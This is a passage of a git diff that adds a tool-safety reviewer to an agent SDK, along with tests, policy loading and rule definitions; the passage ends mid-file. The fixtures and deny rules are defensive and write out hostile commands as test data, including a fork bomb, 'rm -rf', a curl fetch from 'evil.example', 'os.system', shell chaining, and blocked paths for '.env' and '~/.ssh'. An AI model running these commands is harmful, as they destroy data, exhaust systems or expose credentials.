cli.main([str(script)]) + elapsed = time.perf_counter() - started_at + + output = json.loads(capsys.readouterr().out) + assert exit_code == 0 + assert output["decision"] == "allow" + assert elapsed <= 1.0 diff --git a/tests/tools/safety/test_cli_subprocess.py b/tests/tools/safety/test_cli_subprocess.py new file mode 100644 index 00000000..03952565 --- /dev/null +++ b/tests/tools/safety/test_cli_subprocess.py @@ -0,0 +1,44 @@ +"""Tests for standalone tool_safety_check subprocess behavior.""" + +from __future__ import annotations + +import json +import os +import subprocess +import sys +from pathlib import Path + + +def test_tool_safety_check_subprocess_exit_codes(tmp_path) -> None: + script_path = Path(__file__).resolve().parents[3] / "scripts" / "tool_safety_check.py" + safe_script = tmp_path / "safe.py" + deny_script = tmp_path / "deny.sh" + review_script = tmp_path / "review.sh" + env = os.environ.copy() + env.pop("PYTHONPATH", None) + safe_script.write_text("print('ok')\n", encoding="utf-8") + deny_script.write_text("rm -rf /tmp/demo\n", encoding="utf-8") + review_script.write_text("pip install demo\n", encoding="utf-8") + + safe = subprocess.run([sys.executable, str(script_path), str(safe_script)], + check=False, + capture_output=True, + text=True, + env=env) + deny = subprocess.run([sys.executable, str(script_path), str(deny_script)], + check=False, + capture_output=True, + text=True, + env=env) + review = subprocess.run([sys.executable, str(script_path), str(review_script)], + check=False, + capture_output=True, + text=True, + env=env) + + assert safe.returncode == 0 + assert json.loads(safe.stdout)["decision"] == "allow" + assert deny.returncode == 1 + assert json.loads(deny.stdout)["decision"] == "deny" + assert review.returncode == 2 + assert json.loads(review.stdout)["decision"] == "needs_human_review" diff --git a/tests/tools/safety/test_examples.py b/tests/tools/safety/test_examples.py new file mode 100644 index 00000000..ec391a8d --- /dev/null +++ b/tests/tools/safety/test_examples.py @@ -0,0 +1,153 @@ +"""Tests for Tool Safety example report and audit artifacts.""" + +from __future__ import annotations + +import importlib.util +import json +from pathlib import Path + +from trpc_agent_sdk._tool_safety import SafetyReviewer + +_EXAMPLE_CASES = { + "allow_python": { + "path": Path("examples/tool_safety/samples/allow.py"), + "action_type": "python", + "source": "print('hello from tool safety')\n", + }, + "deny_bash": { + "path": + Path("examples/tool_safety/samples/deny.sh"), + "action_type": + "bash", + "source": ("# Inert sample: rm -rf /tmp/demo\n" + "printf '%s\\n' 'destructive delete sample is intentionally not executed'\n"), + }, + "needs_human_review_bash": { + "path": + Path("examples/tool_safety/samples/needs_human_review.sh"), + "action_type": + "bash", + "source": ("# Inert sample: npm install left-pad\n" + "printf '%s\\n' 'dependency install sample is intentionally not executed'\n"), + }, +} + + +def test_example_report_matches_current_cli_report_schema() -> None: + cli = _load_cli_module() + report = _read_example_report() + reports = report["reports"] + + assert report["schema_version"] == 1 + assert {item["decision"] for item in reports} == {"allow", "deny", "needs_human_review"} + + reviewer = SafetyReviewer() + for item in reports: + case = _EXAMPLE_CASES[item["case"]] + review = reviewer.review( + case["source"], + action_type=case["action_type"], + tool_name="tool_safety_check", + ) + expected = { + "case": item["case"], + "action_type": case["action_type"], + **cli._build_report(review, case["path"]), + } + assert item == expected + + +def test_example_audit_jsonl_lines_are_valid_json() -> None: + records = _read_example_audit_records() + + assert len(records) >= 3 + assert {record["decision"] for record in records} >= {"allow", "deny", "needs_human_review"} + for record in records: + for key in { + "tool_name", + "decision", + "risk_level", + "rule_id", + "blocked", + "latency", + "timestamp", + "input_sha256", + }: + assert key in record + assert isinstance(record["blocked"], bool) + assert isinstance(record["latency"], (int, float)) + assert isinstance(record["timestamp"], str) + assert isinstance(record["input_sha256"], str) + assert len(record["input_sha256"]) == 64 + + +def test_example_audit_matches_current_reviewer_stable_fields() -> None: + records = _read_example_audit_records() + records_by_case = {record["case"]: record for record in records} + reviewer = SafetyReviewer() + + for case_name, case in _EXAMPLE_CASES.items(): + review = reviewer.review( + case["source"], + action_type=case["action_type"], + tool_name="tool_safety_check", + ) + record = records_by_case[case_name] + for key in { + "tool_name", + "decision", + "risk_level", + "rule_id", + "blocked", + "desensitized", + "action_type", + "input_sha256", + "allowed_domains", + "rules_evaluated", + }: + assert record[key] == review.audit[key] + + +def test_example_files_can_be_reloaded() -> None: + report = _read_example_report() + records = _read_example_audit_records() + + assert isinstance(report, dict) + assert isinstance(report["reports"], list) + assert all(isinstance(record, dict) for record in records) + + +def test_cli_scans_public_example_scripts(capsys) -> None: + cli = _load_cli_module() + project_root = Path(__file__).resolve().parents[3] + + for case, expected_exit_code, expected_decision in ( + (_EXAMPLE_CASES["allow_python"], 0, "allow"), + (_EXAMPLE_CASES["deny_bash"], 1, "deny"), + (_EXAMPLE_CASES["needs_human_review_bash"], 2, "needs_human_review"), + ): + exit_code = cli.main([str(project_root / case["path"])]) + output = json.loads(capsys.readouterr().out) + + assert exit_code == expected_exit_code + assert output["decision"] == expected_decision + assert output["path"].endswith(str(case["path"])) + + +def _load_cli_module(): + script_path = Path(__file__).resolve().parents[3] / "scripts" / "tool_safety_check.py" + spec = importlib.util.spec_from_file_location("tool_safety_check", script_path) + module = importlib.util.module_from_spec(spec) + assert spec.loader is not None + spec.loader.exec_module(module) + return module + + +def _read_example_report() -> dict: + report_path = Path(__file__).resolve().parents[3] / "examples" / "tool_safety" / "tool_safety_report.json" + return json.loads(report_path.read_text(encoding="utf-8")) + + +def _read_example_audit_records() -> list[dict]: + audit_path = Path(__file__).resolve().parents[3] / "examples" / "tool_safety" / "tool_safety_audit.jsonl" + return [json.loads(line) for line in audit_path.read_text(encoding="utf-8").splitlines() if line.strip()] diff --git a/tests/tools/safety/test_filter.py b/tests/tools/safety/test_filter.py new file mode 100644 index 00000000..91535a74 --- /dev/null +++ b/tests/tools/safety/test_filter.py @@ -0,0 +1,100 @@ +"""Tests for the tool safety filter integration.""" + +from __future__ import annotations + +from types import SimpleNamespace +from unittest.mock import MagicMock +from unittest.mock import patch + +import pytest + +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools import FunctionTool +from trpc_agent_sdk.tools.safety import ToolSafetyFilter + + +@pytest.fixture +def mock_tool_context(): + ctx = MagicMock(spec=InvocationContext) + ctx.agent_context = MagicMock() + ctx.agent = MagicMock() + ctx.agent.before_tool_callback = None + ctx.agent.after_tool_callback = None + ctx.agent.parallel_tool_calls = False + return ctx + + +async def test_filter_allows_safe_tool_request() -> None: + safety_filter = ToolSafetyFilter() + rsp = FilterResult() + + with patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=SimpleNamespace(name="safe_tool")): + await safety_filter._before(MagicMock(), {"query": "hello"}, rsp) + + assert rsp.rsp is None + assert rsp.error is None + assert rsp.is_continue is True + + +async def test_filter_blocks_deny_decision_before_tool_runs(mock_tool_context) -> None: + called = False + + def dangerous_tool(command: str): + nonlocal called + called = True + return {"command": command} + + tool = FunctionTool(dangerous_tool, filters=[ToolSafetyFilter()]) + + result = await tool.run_async(tool_context=mock_tool_context, args={"command": "rm -rf /tmp/demo"}) + + assert called is False + assert result["success"] is False + assert result["error"].startswith("TOOL_SAFETY_BLOCKED:") + assert result["safety"]["decision"] == "deny" + assert result["safety"]["rule_id"] == "dangerous_delete" + assert result["safety"]["tool_name"] == "dangerous_tool" + assert result["safety_audit"]["action_type"] == "bash" + + +async def test_filter_blocks_needs_human_review_by_default() -> None: + safety_filter = ToolSafetyFilter() + rsp = FilterResult() + + with patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=SimpleNamespace(name="Bash")): + await safety_filter._before(MagicMock(), {"command": "npm install left-pad"}, rsp) + + assert rsp.is_continue is False + assert rsp.error is None + assert rsp.rsp["safety"]["decision"] == "needs_human_review" + assert rsp.rsp["safety"]["rule_id"] == "npm_install" + + +async def test_filter_policy_allows_allowlisted_network_request() -> None: + safety_filter = ToolSafetyFilter(policy=ToolSafetyPolicy(allowed_domains=("api.example.com", ))) + rsp = FilterResult() + + with patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=SimpleNamespace(name="web_fetch")): + await safety_filter._before(MagicMock(), {"url": "https://api.example.com/v1/items"}, rsp) + + assert rsp.rsp is None + assert rsp.error is None + assert rsp.is_continue is True + + +async def test_filter_can_allow_human_review_decisions_when_configured(mock_tool_context) -> None: + called = False + + def install_tool(command: str): + nonlocal called + called = True + return {"accepted": command} + + tool = FunctionTool(install_tool, filters=[ToolSafetyFilter(block_decisions=("deny", ))]) + + result = await tool.run_async(tool_context=mock_tool_context, args={"command": "npm install left-pad"}) + + assert called is True + assert result == {"accepted": "npm install left-pad"} diff --git a/tests/tools/safety/test_policy.py b/tests/tools/safety/test_policy.py new file mode 100644 index 00000000..0785d846 --- /dev/null +++ b/tests/tools/safety/test_policy.py @@ -0,0 +1,149 @@ +"""Tests for tool safety policy loading and policy-driven review.""" + +from __future__ import annotations + +import pytest + +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import SafetyPolicyError +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_policy import load_tool_safety_policy + + +def test_load_policy_from_yaml(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: + - api.example.com +blocked_paths: + read_dotenv: + - ".env" + read_ssh: + - "~/.ssh" +allowed_commands: + - python3 +max_timeout: 30 +max_output_size: 4096 +risk_levels: + network_not_allowlisted: critical +""", + encoding="utf-8", + ) + + policy = load_tool_safety_policy(policy_file) + + assert policy.allowed_domains == ("api.example.com", ) + assert policy.blocked_paths_for("read_dotenv") == (".env", ) + assert policy.blocked_paths_for("read_ssh") == ("~/.ssh", ) + assert policy.allowed_commands == ("python3", ) + assert policy.max_timeout == 30 + assert policy.max_output_size == 4096 + assert policy.risk_level_for("network_not_allowlisted") == "critical" + assert policy.risk_level_for("read_dotenv") == "high" + + +def test_load_policy_with_missing_fields_uses_defaults(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: + - api.example.com +""", + encoding="utf-8", + ) + + policy = load_tool_safety_policy(policy_file) + default_policy = ToolSafetyPolicy.default() + + assert policy.allowed_domains == ("api.example.com", ) + assert policy.blocked_paths == default_policy.blocked_paths + assert policy.allowed_commands == default_policy.allowed_commands + assert policy.max_timeout == default_policy.max_timeout + assert policy.max_output_size == default_policy.max_output_size + assert policy.risk_level_for("read_ssh") == default_policy.risk_level_for("read_ssh") + + +def test_missing_policy_file_uses_defaults(tmp_path) -> None: + policy = load_tool_safety_policy(tmp_path / "missing.yaml") + + assert policy == ToolSafetyPolicy.default() + + +def test_invalid_yaml_format_raises_clear_error(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text("allowed_domains: [", encoding="utf-8") + + with pytest.raises(SafetyPolicyError, match="Invalid tool safety policy YAML"): + load_tool_safety_policy(policy_file) + + +def test_invalid_policy_shape_raises_clear_error(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: "api.example.com" +""", + encoding="utf-8", + ) + + with pytest.raises(SafetyPolicyError, match="allowed_domains"): + load_tool_safety_policy(policy_file) + + +def test_allowed_domains_policy_changes_network_decision_without_code_changes(tmp_path) -> None: + source = "curl https://evil.example/download" + default_review = SafetyReviewer().review(source, action_type="bash") + assert default_review.decision == "deny" + assert default_review.rule_id == "network_not_allowlisted" + + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: + - evil.example +""", + encoding="utf-8", + ) + policy = load_tool_safety_policy(policy_file) + + review = SafetyReviewer(policy=policy).review(source, action_type="bash") + + assert review.decision == "allow" + assert review.rule_id == "network_allowlist" + + +def test_allowed_domains_policy_does_not_short_circuit_other_rules() -> None: + policy = ToolSafetyPolicy(allowed_domains=("api.example.com", )) + + review = SafetyReviewer(policy=policy).review( + "curl https://api.example.com/download && rm -rf /tmp/demo", + action_type="bash", + ) + + assert review.decision == "deny" + assert review.rule_id == "dangerous_delete" + + +def test_blocked_paths_policy_changes_path_decision_without_code_changes(tmp_path) -> None: + source = "from pathlib import Path\nprint(Path('.custom_blocked_file').read_text())" + default_review = SafetyReviewer().review(source, action_type="python") + assert default_review.decision == "allow" + assert default_review.rule_id == "safe_python" + + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +blocked_paths: + read_dotenv: + - ".custom_blocked_file" +""", + encoding="utf-8", + ) + policy = load_tool_safety_policy(policy_file) + + review = SafetyReviewer(policy=policy).review(source, action_type="python") + + assert review.decision == "deny" + assert review.rule_id == "read_dotenv" + assert review.report["evidence"] == ".custom_blocked_file" diff --git a/tests/tools/safety/test_rules.py b/tests/tools/safety/test_rules.py new file mode 100644 index 00000000..0fbff492 --- /dev/null +++ b/tests/tools/safety/test_rules.py @@ -0,0 +1,122 @@ +"""Tests for additional tool safety rules.""" + +from __future__ import annotations + +import pytest + +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy + + +@pytest.mark.parametrize( + ("source", "action_type", "decision", "rule_id", "finding"), + [ + ( + "import os\nos.system('id')", + "python", + "deny", + "os_system_execution", + "OS system command execution detected.", + ), + ( + "echo safe; whoami", + "bash", + "needs_human_review", + "shell_injection", + "Shell command chaining pattern detected.", + ), + ( + "wget $TARGET_URL", + "bash", + "deny", + "wget_network", + "Wget network command detected.", + ), + ( + "npm install left-pad", + "bash", + "needs_human_review", + "npm_install", + "NPM package installation command detected.", + ), + ( + "apt-get install curl", + "bash", + "needs_human_review", + "apt_install", + "APT package installation command detected.", + ), + ( + "import aiohttp\nasync with aiohttp.ClientSession() as session:\n pass", + "python", + "deny", + "aiohttp_network", + "aiohttp network client usage detected.", + ), + ( + "import socket\nclient = socket.socket()", + "python", + "deny", + "socket_network", + "Socket network usage detected.", + ), + ( + ":(){ :|:& }; :", + "bash", + "deny", + "fork_bomb", + "Fork bomb pattern detected.", + ), + ( + "from concurrent.futures import ThreadPoolExecutor\nThreadPoolExecutor(max_workers=1000)", + "python", + "deny", + "excessive_concurrency", + "Excessive concurrency pattern detected.", + ), + ( + "from pathlib import Path\nPath('big.bin').write_bytes(b'0' * 100000000)", + "python", + "deny", + "large_file_write", + "Large file write pattern detected.", + ), + ], +) +def test_additional_rules_are_independent_and_structured(source, action_type, decision, rule_id, finding) -> None: + review = SafetyReviewer().review(source, action_type=action_type, tool_name="safety_test") + + assert review.decision == decision + assert review.rule_id == rule_id + assert review.finding == finding + assert review.report["finding"] == finding + assert review.report["rule_id"] == rule_id + assert review.report["decision"] == decision + assert review.audit["rule_id"] == rule_id + assert review.audit["decision"] == decision + assert rule_id in review.audit["rules_evaluated"] + + +@pytest.mark.parametrize( + ("source", "action_type", "rule_id"), + [ + ("import os\nos.system('id')", "python", "os_system_execution"), + ("echo safe; whoami", "bash", "shell_injection"), + ("wget $TARGET_URL", "bash", "wget_network"), + ("npm install left-pad", "bash", "npm_install"), + ("apt install curl", "bash", "apt_install"), + ("import aiohttp", "python", "aiohttp_network"), + ("import socket", "python", "socket_network"), + (":(){ :|:& }; :", "bash", "fork_bomb"), + ("ThreadPoolExecutor(max_workers=1000)", "python", "excessive_concurrency"), + ("Path('big.bin').write_bytes(b'0' * 100000000)", "python", "large_file_write"), + ], +) +def test_additional_rules_get_risk_level_from_policy(source, action_type, rule_id) -> None: + policy = ToolSafetyPolicy(risk_levels={rule_id: "policy_override"}) + + review = SafetyReviewer(policy=policy).review(source, action_type=action_type) + + assert review.rule_id == rule_id + assert review.report["risk_level"] == "policy_override" + assert review.audit["risk_level"] == "policy_override" diff --git a/tests/tools/safety/test_telemetry.py b/tests/tools/safety/test_telemetry.py new file mode 100644 index 00000000..48407b96 --- /dev/null +++ b/tests/tools/safety/test_telemetry.py @@ -0,0 +1,142 @@ +"""Tests for tool safety telemetry attributes.""" + +from __future__ import annotations + +from unittest.mock import MagicMock +from unittest.mock import patch + +import pytest +from typing_extensions import override + +from examples.tool_safety.wrappers import SafetyReviewedCodeExecutor +from examples.tool_safety.wrappers import SafetyReviewedSkillRunner +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk.code_executors import BaseCodeExecutor +from trpc_agent_sdk.code_executors import CodeBlock +from trpc_agent_sdk.code_executors import CodeExecutionInput +from trpc_agent_sdk.code_executors import CodeExecutionResult +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools.safety import ToolSafetyFilter +from trpc_agent_sdk.types import Outcome + + +class RecordingCodeExecutor(BaseCodeExecutor): + """Code executor that returns a fixed successful result.""" + + @override + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + del invocation_context, code_execution_input + return CodeExecutionResult(outcome=Outcome.OUTCOME_OK, output="executed") + + +class RecordingSkillTool: + """Skill-like object that returns a fixed successful result.""" + + async def run_async(self, *, tool_context: InvocationContext, args: dict) -> dict: + del tool_context, args + return {"success": True} + + +@pytest.mark.parametrize( + ("args", "decision", "risk_level", "rule_id"), + [ + ({ + "query": "hello" + }, "allow", "none", "safe_python"), + ({ + "command": "rm -rf /tmp/demo" + }, "deny", "critical", "dangerous_delete"), + ({ + "command": "npm install left-pad" + }, "needs_human_review", "medium", "npm_install"), + ], +) +async def test_tool_safety_filter_traces_review_attributes(args, decision, risk_level, rule_id) -> None: + span = MagicMock() + safety_filter = ToolSafetyFilter() + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span), \ + patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=MagicMock(name="demo_tool")): + await safety_filter._before(MagicMock(), args, FilterResult()) + + _assert_safety_attributes(span, decision, risk_level, rule_id) + + +@pytest.mark.parametrize( + ("code_input", "decision", "risk_level", "rule_id"), + [ + (CodeExecutionInput(code="print('hello')"), "allow", "none", "safe_python"), + ( + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="rm -rf /tmp/demo")]), + "deny", + "critical", + "dangerous_delete", + ), + ( + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="pip install unsafe-package")]), + "needs_human_review", + "medium", + "package_install", + ), + ], +) +async def test_code_executor_wrapper_traces_review_attributes(code_input, decision, risk_level, rule_id) -> None: + span = MagicMock() + wrapper = SafetyReviewedCodeExecutor(RecordingCodeExecutor()) + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span): + await wrapper.execute_code(MagicMock(), code_input) + + _assert_safety_attributes(span, decision, risk_level, rule_id) + + +@pytest.mark.parametrize( + ("args", "decision", "risk_level", "rule_id"), + [ + ({ + "skill": "demo", + "command": "python scripts/run.py" + }, "allow", "none", "safe_python"), + ({ + "skill": "demo", + "command": "rm -rf /tmp/demo" + }, "deny", "critical", "dangerous_delete"), + ({ + "skill": "demo", + "command": "npm install left-pad" + }, "needs_human_review", "medium", "npm_install"), + ], +) +async def test_skill_wrapper_traces_review_attributes(args, decision, risk_level, rule_id) -> None: + span = MagicMock() + wrapper = SafetyReviewedSkillRunner(RecordingSkillTool()) + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span): + await wrapper.run(MagicMock(), args) + + _assert_safety_attributes(span, decision, risk_level, rule_id) + + +async def test_tool_safety_telemetry_failure_does_not_block_tool_filter() -> None: + span = MagicMock() + span.set_attribute.side_effect = RuntimeError("otel disabled") + safety_filter = ToolSafetyFilter() + rsp = FilterResult() + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span), \ + patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=MagicMock(name="demo_tool")): + await safety_filter._before(MagicMock(), {"query": "hello"}, rsp) + + assert rsp.rsp is None + assert rsp.error is None + assert rsp.is_continue is True + + +def _assert_safety_attributes(span: MagicMock, decision: str, risk_level: str, rule_id: str) -> None: + span.set_attribute.assert_any_call("tool.safety.decision", decision) + span.set_attribute.assert_any_call("tool.safety.risk_level", risk_level) + span.set_attribute.assert_any_call("tool.safety.rule_id", rule_id) diff --git a/tests/tools/safety/test_wrappers.py b/tests/tools/safety/test_wrappers.py new file mode 100644 index 00000000..709b259d --- /dev/null +++ b/tests/tools/safety/test_wrappers.py @@ -0,0 +1,161 @@ +"""Tests for tool safety wrapper examples.""" + +from __future__ import annotations + +import json +from typing_extensions import override +from unittest.mock import MagicMock + +from examples.tool_safety.wrappers import SafetyReviewedCodeExecutor +from examples.tool_safety.wrappers import SafetyReviewedSkillRunner +from trpc_agent_sdk.code_executors import BaseCodeExecutor +from trpc_agent_sdk.code_executors import CodeBlock +from trpc_agent_sdk.code_executors import CodeExecutionInput +from trpc_agent_sdk.code_executors import CodeExecutionResult +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools.safety import SafetyReviewer +from trpc_agent_sdk.types import Outcome + + +class RecordingCodeExecutor(BaseCodeExecutor): + """Code executor that records whether execution was delegated.""" + + called: bool = False + + @override + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + del invocation_context, code_execution_input + self.called = True + return CodeExecutionResult(outcome=Outcome.OUTCOME_OK, output="executed") + + +class RecordingSkillTool: + """Skill-like tool that records direct run_async calls.""" + + def __init__(self) -> None: + self.called = False + + async def run_async(self, *, tool_context: InvocationContext, args: dict) -> dict: + del tool_context + self.called = True + return {"success": True, "args": args} + + +async def test_code_executor_wrapper_allows_safe_code() -> None: + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner) + + result = await wrapper.execute_code(MagicMock(), CodeExecutionInput(code="print('hello')")) + + assert inner.called is True + assert result.outcome == Outcome.OUTCOME_OK + assert result.output == "executed" + + +async def test_code_executor_wrapper_blocks_deny_without_execution() -> None: + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner) + + result = await wrapper.execute_code( + MagicMock(), + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="rm -rf /tmp/demo")]), + ) + + payload = json.loads(result.output) + assert inner.called is False + assert result.outcome == Outcome.OUTCOME_FAILED + assert payload["success"] is False + assert payload["safety"]["decision"] == "deny" + assert payload["safety"]["rule_id"] == "dangerous_delete" + assert payload["safety_audit"]["tool_name"] == "code_executor" + + +async def test_code_executor_wrapper_returns_human_review_result() -> None: + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner) + + result = await wrapper.execute_code( + MagicMock(), + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="pip install unsafe-package")]), + ) + + payload = json.loads(result.output) + assert inner.called is False + assert payload["safety"]["decision"] == "needs_human_review" + assert payload["safety"]["rule_id"] == "package_install" + assert payload["human_review"]["required"] is True + assert payload["human_review"]["status"] == "pending" + + +async def test_code_executor_wrapper_uses_provided_reviewer() -> None: + reviewer = SafetyReviewer(allowed_domains=("api.example.com", )) + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner, reviewer=reviewer) + + result = await wrapper.execute_code( + MagicMock(), + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="curl https://api.example.com/items")]), + ) + + assert wrapper.reviewer is reviewer + assert inner.called is True + assert result.outcome == Outcome.OUTCOME_OK + + +async def test_skill_wrapper_allows_safe_command() -> None: + inner = RecordingSkillTool() + wrapper = SafetyReviewedSkillRunner(inner) + + result = await wrapper.run(MagicMock(), {"skill": "demo", "command": "python scripts/run.py"}) + + assert inner.called is True + assert result == {"success": True, "args": {"skill": "demo", "command": "python scripts/run.py"}} + + +async def test_skill_wrapper_blocks_deny_without_running_skill() -> None: + inner = RecordingSkillTool() + wrapper = SafetyReviewedSkillRunner(inner) + + result = await wrapper.run(MagicMock(), {"skill": "demo", "command": "rm -rf /tmp/demo"}) + + assert inner.called is False + assert result["success"] is False + assert result["safety"]["decision"] == "deny" + assert result["safety"]["rule_id"] == "dangerous_delete" + assert result["safety_audit"]["tool_name"] == "skill_run" + + +async def test_skill_wrapper_returns_human_review_result() -> None: + inner = RecordingSkillTool() + wrapper = SafetyReviewedSkillRunner(inner) + + result = await wrapper.run(MagicMock(), {"skill": "demo", "command": "npm install left-pad"}) + + assert inner.called is False + assert result["safety"]["decision"] == "needs_human_review" + assert result["safety"]["rule_id"] == "npm_install" + assert result["human_review"]["required"] is True + assert result["human_review"]["status"] == "pending" + + +async def test_skill_wrapper_can_wrap_callable_and_reuse_reviewer() -> None: + reviewer = SafetyReviewer(allowed_domains=("api.example.com", )) + called = False + + async def runner(tool_context: InvocationContext, args: dict) -> dict: + nonlocal called + del tool_context + called = True + return {"ok": args["url"]} + + wrapper = SafetyReviewedSkillRunner(runner, reviewer=reviewer, tool_name="custom_skill") + + result = await wrapper.run(MagicMock(), {"url": "https://api.example.com/data"}) + + assert wrapper.reviewer is reviewer + assert called is True + assert result == {"ok": "https://api.example.com/data"} diff --git a/trpc_agent_sdk/_tool_safety.py b/trpc_agent_sdk/_tool_safety.py new file mode 100644 index 00000000..1a4c2c0c --- /dev/null +++ b/trpc_agent_sdk/_tool_safety.py @@ -0,0 +1,415 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Structured safety review for generated code and shell actions.""" + +from __future__ import annotations + +import hashlib +import re +import time +from dataclasses import dataclass +from typing import Any +from typing import Iterable +from urllib.parse import urlparse + +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_policy import load_tool_safety_policy + + +@dataclass(frozen=True) +class SafetyReview: + """Result of a safety review decision.""" + + decision: str + rule_id: str + finding: str + report: dict[str, Any] + audit: dict[str, Any] + + +@dataclass(frozen=True) +class Rule: + """Pattern-based safety rule.""" + + rule_id: str + decision: str + finding: str + recommendation: str + pattern: re.Pattern[str] + + +_RULES: tuple[Rule, ...] = ( + Rule( + rule_id="dangerous_delete", + decision="deny", + finding="Destructive delete operation detected.", + recommendation="Do not run destructive deletes without explicit user approval and scoped paths.", + pattern=re.compile( + r"\b(rm\s+-[^\n;&|]*[rf]|shutil\.rmtree|os\.remove|os\.unlink|Path\([^)]*\)\.unlink)", + re.IGNORECASE, + ), + ), + Rule( + rule_id="subprocess_execution", + decision="deny", + finding="Subprocess execution from Python detected.", + recommendation="Avoid spawning child processes from generated Python unless explicitly approved.", + pattern=re.compile(r"\bsubprocess\.(?:run|Popen|call|check_call|check_output)\b|\bimport\s+subprocess\b"), + ), + Rule( + rule_id="os_system_execution", + decision="deny", + finding="OS system command execution detected.", + recommendation="Avoid os.system calls unless the command is explicitly approved.", + pattern=re.compile(r"\bos\.system\s*\("), + ), + Rule( + rule_id="package_install", + decision="needs_human_review", + finding="Package installation command detected.", + recommendation="Send dependency installation through human review before mutating the environment.", + pattern=re.compile(r"\b(?:pip|pip3|python(?:3)?\s+-m\s+pip)\s+install\b", re.IGNORECASE), + ), + Rule( + rule_id="npm_install", + decision="needs_human_review", + finding="NPM package installation command detected.", + recommendation="Send npm dependency installation through human review before mutating the environment.", + pattern=re.compile(r"\bnpm\s+(?:install|i)\b", re.IGNORECASE), + ), + Rule( + rule_id="apt_install", + decision="needs_human_review", + finding="APT package installation command detected.", + recommendation="Send system package installation through human review before mutating the environment.", + pattern=re.compile(r"\b(?:apt|apt-get)\s+install\b", re.IGNORECASE), + ), + Rule( + rule_id="infinite_loop", + decision="deny", + finding="Potential unbounded loop detected.", + recommendation="Add a bounded condition, timeout, or cancellation path before execution.", + pattern=re.compile(r"\bwhile\s+True\s*:|\bfor\s+.*\bin\s+itertools\.count\s*\(", re.IGNORECASE), + ), + Rule( + rule_id="sensitive_output", + decision="deny", + finding="Potential sensitive information output detected.", + recommendation="Redact secrets and avoid printing environment variables or credential values.", + pattern=re.compile( + r"\bprint\s*\(\s*(?:os\.environ|.*(?:api[_-]?key|token|secret|password).*)\)|" + r"\becho\s+\$?(?:API[_-]?KEY|TOKEN|SECRET|PASSWORD)\b", + re.IGNORECASE, + ), + ), + Rule( + rule_id="wget_network", + decision="deny", + finding="Wget network command detected.", + recommendation="Use allowlisted network access only and avoid direct wget calls from generated scripts.", + pattern=re.compile(r"\bwget\b", re.IGNORECASE), + ), + Rule( + rule_id="aiohttp_network", + decision="deny", + finding="aiohttp network client usage detected.", + recommendation="Use allowlisted network access only and avoid direct aiohttp clients from generated scripts.", + pattern=re.compile(r"\baiohttp\.ClientSession\b|\bimport\s+aiohttp\b|\bfrom\s+aiohttp\s+import\b"), + ), + Rule( + rule_id="socket_network", + decision="deny", + finding="Socket network usage detected.", + recommendation="Avoid raw socket access from generated scripts unless explicitly approved.", + pattern=re.compile(r"\bsocket\.socket\s*\(|\bimport\s+socket\b|\bfrom\s+socket\s+import\b"), + ), + Rule( + rule_id="fork_bomb", + decision="deny", + finding="Fork bomb pattern detected.", + recommendation="Do not execute fork bombs or commands that recursively spawn processes.", + pattern=re.compile(r":\(\)\s*\{.*\};\s*:", re.DOTALL), + ), + Rule( + rule_id="bash_pipe", + decision="needs_human_review", + finding="Bash pipeline detected.", + recommendation="Review piped shell commands because pipes can hide data flow between commands.", + pattern=re.compile(r"(?]+", re.IGNORECASE) + + +class SafetyReviewer: + """Evaluate generated actions against deterministic safety rules.""" + + def __init__( + self, + allowed_domains: Iterable[str] | None = None, + *, + policy: ToolSafetyPolicy | None = None, + policy_path: str | None = None, + ) -> None: + base_policy = policy if policy is not None else load_tool_safety_policy(policy_path) + if allowed_domains is not None: + base_policy = base_policy.with_allowed_domains(_normalize_host(domain) for domain in allowed_domains) + self.policy = base_policy + + def review(self, text: str, *, action_type: str = "python", tool_name: str = "") -> SafetyReview: + """Return a structured 